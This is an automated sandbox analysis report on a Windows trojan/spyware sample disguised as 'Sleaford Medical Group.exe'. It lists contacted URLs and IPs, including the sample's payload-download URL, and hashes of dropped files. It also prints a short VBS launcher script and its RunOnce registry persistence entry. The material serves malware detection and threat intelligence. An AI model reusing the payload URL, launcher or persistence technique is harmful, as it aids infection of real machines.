                        http://www.carterandcone.comlexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://r3.i.lencr.org/0Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://01677937777.burrow.io/spark/binwhyte_utZnZr121.binSleaford Medical Group.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://fontfabrik.comexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://01677937777.burrow.io/spark/binwhyte_utZnZr121.bin38Sleaford Medical Group.exe, 00000016.00000002.565857663.0000000000858000.00000004.00000020.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://r3.o.lencr.org0Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8explorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fonts.comexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comexplorer.exe, 00000018.00000000.524854082.0000000008B46000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://01677937777.burrow.io/uzTFSleaford Medical Group.exe, 00000016.00000002.566373992.0000000000870000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://cps.root-x1.letsencrypt.org0Sleaford Medical Group.exe, 00000016.00000002.567348461.0000000000899000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                159.203.144.58
                                		unknownUnited States
                                		14061DIGITALOCEAN-ASNUSfalse
                                104.21.89.82
                                		unknownUnited States
                                		13335CLOUDFLARENETUStrue

                                General Information

                                Joe Sandbox Version:31.0.0 Emerald
                                Analysis ID:358420
                                Start date:25.02.2021
                                Start time:15:42:17
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 10m 58s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Sleaford Medical Group.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:36
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@10/2@3/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 56% (good quality ratio 47.2%)
                                • Quality average: 68.5%
                                • Quality standard deviation: 35.1%
                                HCA Information:
                                • Successful, ratio: 63%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240s for sample files taking high CPU consumption
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 51.104.139.180, 13.88.21.125, 168.61.161.212, 104.43.139.144, 23.211.6.115, 52.255.188.83, 184.30.24.56, 8.253.207.120, 67.27.233.254, 67.27.159.126, 67.26.73.254, 8.248.149.254, 40.88.32.150, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156
                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:45:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs
                                15:45:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Tolerances6 C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                159.203.144.58https://ob4lyn.burrow.io/septslip121/?8=generalserve8ip11-8666yu78788887898178808&rav=kwells@afex.comGet hashmaliciousBrowse

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  CLOUDFLARENETUSCN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                  • 172.67.172.17
                                  dwg.exeGet hashmaliciousBrowse
                                  • 104.21.56.93
                                  Purchase Order.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  DHL Shipment Notification 49833912.pdf.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  UAE CONTRACT SUPPLY.exeGet hashmaliciousBrowse
                                  • 104.21.32.11
                                  RFQ - REF 208056-pdf.exeGet hashmaliciousBrowse
                                  • 172.67.172.17
                                  CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                  • 172.67.172.17
                                  twistercrypted.exeGet hashmaliciousBrowse
                                  • 104.18.28.12
                                  C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                  • 104.16.19.94
                                  C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                  • 104.16.18.94
                                  C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                  • 104.17.234.204
                                  Returned Message Body.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  W175EHpHv3.exeGet hashmaliciousBrowse
                                  • 172.67.194.108
                                  Bankdaten #f6356.pdf.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  W175EHpHv3.exeGet hashmaliciousBrowse
                                  • 172.67.194.108
                                  PO#2102003.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  Qvc Order .exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  company inquiry.exeGet hashmaliciousBrowse
                                  • 172.67.188.154
                                  Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  Order NX-LI-15-0001.exeGet hashmaliciousBrowse
                                  • 104.21.19.200
                                  DIGITALOCEAN-ASNUSFB_1401_4_5,pdf.exeGet hashmaliciousBrowse
                                  • 192.241.224.26
                                  document-9725971.xlsGet hashmaliciousBrowse
                                  • 206.189.10.247
                                  sOoaouUC1z.dllGet hashmaliciousBrowse
                                  • 198.211.118.187
                                  SecuriteInfo.com.Heur.12472.xlsGet hashmaliciousBrowse
                                  • 128.199.91.194
                                  SecuriteInfo.com.Heur.12472.xlsGet hashmaliciousBrowse
                                  • 128.199.91.194
                                  dkWZ6hSN9M.dllGet hashmaliciousBrowse
                                  • 206.189.10.247
                                  document-197066197.xlsGet hashmaliciousBrowse
                                  • 206.189.10.247
                                  530000.exeGet hashmaliciousBrowse
                                  • 198.199.100.10
                                  fecRZG3xtP.exeGet hashmaliciousBrowse
                                  • 138.197.53.157
                                  MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                  • 139.59.61.215
                                  Complaint_Letter_1186814227-02192021.xlsGet hashmaliciousBrowse
                                  • 159.89.174.35
                                  Complaint_Letter_1186814227-02192021.xlsGet hashmaliciousBrowse
                                  • 159.89.174.35
                                  Quotation Reques.exeGet hashmaliciousBrowse
                                  • 138.197.103.178
                                  NewOrder.xlsmGet hashmaliciousBrowse
                                  • 167.99.202.53
                                  rieuro.dllGet hashmaliciousBrowse
                                  • 206.189.10.247
                                  document-1915351743.xlsGet hashmaliciousBrowse
                                  • 206.189.10.247
                                  DHL_Shipment_Notification#5436637389_22_FEB.exeGet hashmaliciousBrowse
                                  • 165.22.240.4
                                  124992436.docxGet hashmaliciousBrowse
                                  • 68.183.127.92
                                  124992436.docxGet hashmaliciousBrowse
                                  • 68.183.127.92

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  37f463bf4616ecd445d4a1937da06e19UAE CONTRACT SUPPLY.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  CustomerStatement.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Payment.htmlGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  EmployeeAnnualReport.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Customer Statement.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Remittance advice.htmGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Customer Statement.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Order-10236587458.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  RFQ_110199282773666355627277288.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  EMG 3.0.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  QUOTATION.xlsxGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  VM_629904-26374.htmGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  caraganas.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Notification 466022.xlsmGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Fax #136.xlsmGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Purchase Order22420.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  ceFlxYfe4F.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Fatura.exeGet hashmaliciousBrowse
                                  • 159.203.144.58
                                  Reports #176.xlsmGet hashmaliciousBrowse
                                  • 159.203.144.58

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
                                  Process:C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):106496
                                  Entropy (8bit):5.644325868779004
                                  Encrypted:false
                                  SSDEEP:1536:mnA+SyZTzpDk5xhps4CW9c6mc1wTYrYg7OsmHevXnqlY:mnlSCuTnCWzfw81gHUXnqu
                                  MD5:DDE7E39D025B75849184C077517030AE
                                  SHA1:6350E468239B6099421676FB6FF289A27F8CDA5A
                                  SHA-256:BA1AE604539B6CDE921342BAACEB3EB82149B0F15C369B77020B38254A586629
                                  SHA-512:9FB2C6A926BF66602FFCE354AF6D8C7906D8E3177DF49A640B05CF99C2729239F6EC2806E3422EEBF4A76285B1C1B5C75D20F042A8D3A89207692C4DE17A9A3F
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 11%
                                  Reputation:low
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L......X.................p... ......X.............@.................................a........................................w..(...........................................................................(... .......H............................text...Dm.......p.................. ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs
                                  Process:C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):118
                                  Entropy (8bit):4.912827526146584
                                  Encrypted:false
                                  SSDEEP:3:jfF+m8nhvF3mRDWXp5cViE2J5xAIimYVGMGE9Al:jFqhv9IWXp+N23faGRF
                                  MD5:A0E46FC6089CF4C41E77819A9F42A5C3
                                  SHA1:24C0E7BFBE9A7C3E255F781FC5664CA5DCA70EEF
                                  SHA-256:8A37873731D9BB641F08AB5DA52BA395480F7A77CA4C0F8AAC489EE5832A9527
                                  SHA-512:82F58297629507F385E164CD509BFD7F128AAAB6CDF7E969A02C81FA4A5CD4BA322657801FCDB7A02B58E3511F0F1030CFA4EEA31A14879273A5BE325857277C
                                  Malicious:true
                                  Reputation:low
                                  Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe")

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):5.644325868779004
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:Sleaford Medical Group.exe
                                  File size:106496
                                  MD5:dde7e39d025b75849184c077517030ae
                                  SHA1:6350e468239b6099421676fb6ff289a27f8cda5a
                                  SHA256:ba1ae604539b6cde921342baaceb3eb82149b0f15c369b77020b38254a586629
                                  SHA512:9fb2c6a926bf66602ffce354af6d8c7906d8e3177df49a640b05cf99c2729239f6ec2806e3422eebf4a76285b1c1b5c75d20f042a8d3a89207692c4de17a9a3f
                                  SSDEEP:1536:mnA+SyZTzpDk5xhps4CW9c6mc1wTYrYg7OsmHevXnqlY:mnlSCuTnCWzfw81gHUXnqu
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......X.................p... ......X.............@................

                                  File Icon

                                  Icon Hash:00649090b8b0cdf0

                                  Static PE Info

                                  General

                                  Entrypoint:0x401858
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                  DLL Characteristics:
                                  Time Stamp:0x580D0006 [Sun Oct 23 18:23:02 2016 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:6369448e9215188ae68ccd0107a30bdd

                                  Entrypoint Preview

                                  Instruction
                                  push 0040BF38h
                                  call 00007F08D096FC83h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  inc eax
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dl, bh
                                  test esp, edx
                                  xchg byte ptr [esi], ah

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x177d40x28.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000xefe.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x148.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x16d440x17000False0.392153532609data5.98327704966IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .data0x180000xb080x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc0x190000xefe0x1000False0.356689453125data3.41873073614IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_ICON0x19c160x2e8data
                                  RT_ICON0x1936e0x8a8data
                                  RT_GROUP_ICON0x1934c0x22data
                                  RT_VERSION0x191200x22cdataEnglishUnited States

                                  Imports

                                  DLLImport
                                  MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaR4Str, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr

                                  Version Infos

                                  DescriptionData
                                  Translation0x0409 0x04b0
                                  InternalNameSEMICALCINED
                                  FileVersion1.00
                                  CommentsAxisC Corp.
                                  ProductNameFleksibles
                                  ProductVersion1.00
                                  OriginalFilenameSEMICALCINED.exe

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Feb 25, 2021 15:45:21.164094925 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.288738012 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.289205074 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.312593937 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.436867952 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.440924883 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.440952063 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.440960884 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.442183018 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.546854019 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.674179077 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.674266100 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.698731899 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.863979101 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967134953 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967165947 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967180014 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967191935 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967202902 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967215061 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967226982 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967247009 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967263937 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967279911 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:21.967349052 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:21.967418909 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.091562986 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091595888 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091613054 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091631889 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091649055 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091665030 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091681004 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091696024 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091711998 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091727018 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091742039 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091761112 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091773987 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091784954 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091787100 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.091797113 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091814041 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091830015 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091844082 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091862917 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091877937 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.091880083 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.091911077 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.091948986 CET49734443192.168.2.3159.203.144.58
                                  Feb 25, 2021 15:45:22.216130972 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216162920 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216178894 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216195107 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216213942 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216232061 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216248989 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216264009 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216279984 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216295004 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216310024 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216325045 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216341019 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216360092 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216377020 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216392994 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216408968 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216423988 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216439962 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216454983 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216470957 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216489077 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216506004 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216521025 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216536999 CET44349734159.203.144.58192.168.2.3
                                  Feb 25, 2021 15:45:22.216552973 CET44349734159.203.144.58192.168.2.3
